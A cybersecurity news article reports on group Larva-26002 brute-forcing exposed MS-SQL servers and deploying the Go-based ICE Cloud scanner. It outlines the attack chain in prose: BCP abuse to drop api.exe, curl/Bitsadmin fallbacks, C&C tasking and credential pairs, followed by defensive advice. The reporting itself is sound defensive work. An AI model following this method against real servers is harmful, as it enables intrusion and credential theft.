Threat Actors Exploit MS-SQL Servers to Deploy ICE Cloud Scanner
Key Takeaways The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers. The attackers are deploying a new Go-based scanner malware called ICE Cloud Client. The...
Key Takeaways
- The threat group Larva-26002 is actively targeting exposed Microsoft SQL (MS-SQL) servers.
- The attackers are deploying a new Go-based scanner malware called ICE Cloud Client.
- The campaign, ongoing since January 2024, has shifted from ransomware to large-scale reconnaissance and credential harvesting.
- Poor password hygiene on internet-facing MS-SQL servers is the primary initial compromise vector.
- The campaign’s long-term nature and reconnaissance focus suggest preparation for future, larger-scale attacks.
Persistent Threat Actor Larva-26002 Leverages New ICE Cloud Scanner Against MS-SQL Servers
A sophisticated threat actor, identified as Larva-26002, is relentlessly exploiting vulnerable Microsoft SQL (MS-SQL) servers, deploying a novel scanner malware dubbed ICE Cloud Client. This ongoing campaign, which originated in January 2024, demonstrates a strategic evolution from direct ransomware deployment to extensive reconnaissance of database infrastructure.
Table Of Content
Evolution of the Campaign
Larva-26002’s activities initially came to light in January 2024, when the group focused on compromising internet-exposed MS-SQL servers secured with weak credentials. These early attacks involved the deployment of Trigona and Mimic ransomware. The attackers skillfully utilized the legitimate MS-SQL Bulk Copy Program (BCP) utility to exfiltrate data and drop malicious payloads onto compromised systems. Remote access tools such as AnyDesk and various port forwarders for RDP connections were also installed to maintain persistence.
By 2025, the group had refined its toolkit, incorporating Teramind, a remote monitoring and management (RMM) solution, and transitioning to a Rust-based scanner for its operations. This continuous adaptation of tools and tactics underscores the threat actor’s persistent efforts to enhance their capabilities.
Analysts at ASEC observed a renewed surge of attacks in 2026, targeting many of the same MS-SQL servers previously compromised. In this latest phase, Larva-26002 introduced ICE Cloud, a scanner malware developed in the Go programming language, marking a distinct shift from the Rust-based scanner observed in 2025. The presence of Turkish binary strings within ICE Cloud further reinforces its connection to the Mimic ransomware attacks of 2024, indicating a consistent operational footprint.
The strategic pivot from ransomware to widespread scanning is a significant concern. By establishing a growing network of compromised servers that surreptitiously probe other databases for weak credentials, Larva-26002 appears to be meticulously preparing for more substantial future operations. The intelligence gathered from these scanning activities is transmitted to the attacker’s command-and-control (C&C) server, providing a comprehensive overview of vulnerable database assets across the internet.
ICE Cloud Scanner: The Infection Mechanism
The attack sequence begins with Larva-26002 identifying an MS-SQL server accessible from the internet and protected by weak or easily guessable passwords. Initial access is typically gained through brute-force or dictionary attacks.
Upon successful compromise, the attacker executes standard system commands such as hostname, whoami, and netstat -an to gather information about the target host. Malware deployment frequently leverages the BCP utility, which is exploited to export a malicious binary from a database table named uGnzBdZbsi to a local path as api.exe. This process is orchestrated via a formatting file named FODsOZKgAU.txt, a method that has remained consistent since 2024.
In scenarios where the BCP utility fails to execute, the malware is retrieved using alternative methods, including Curl or Bitsadmin via PowerShell commands.
The api.exe file, identified as the ICE Cloud Launcher, establishes communication with a C&C server for authentication. Following successful authentication, it proceeds to download the core component: the ICE Cloud Client scanner. This client is saved with a random filename to evade detection and mask its malicious nature. After installation, the ICE Cloud Client registers itself with the C&C server, which then dispatches a list of target MS-SQL addresses, along with specific credential pairs (e.g., ecomm/ecomm) and a task string, typically TASK.
The scanner attempts to authenticate against the provided MS-SQL targets using the supplied credentials. Any successful logins are reported back to the C&C server. Notably, the internal binary strings of the ICE Cloud Client are written in Turkish and incorporate emoji characters, potentially suggesting the use of generative AI tools in its development.
What You Should Do
- Implement strong, unique, and complex passwords for all MS-SQL accounts. Enforce regular password rotation policies.
- Ensure all internet-facing MS-SQL servers are protected by a robust firewall, restricting access to only authorized IP addresses and necessary ports.
- Maintain up-to-date endpoint security software across all systems to detect and prevent known malware execution.
- Monitor for unusual activity related to the BCP utility, unexpected file creations (e.g.,
api.exeinC:ProgramData), or unauthorized outbound network connections, and investigate any suspicious indicators promptly. - Regularly audit MS-SQL server configurations for security best practices and apply all available security patches and updates.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.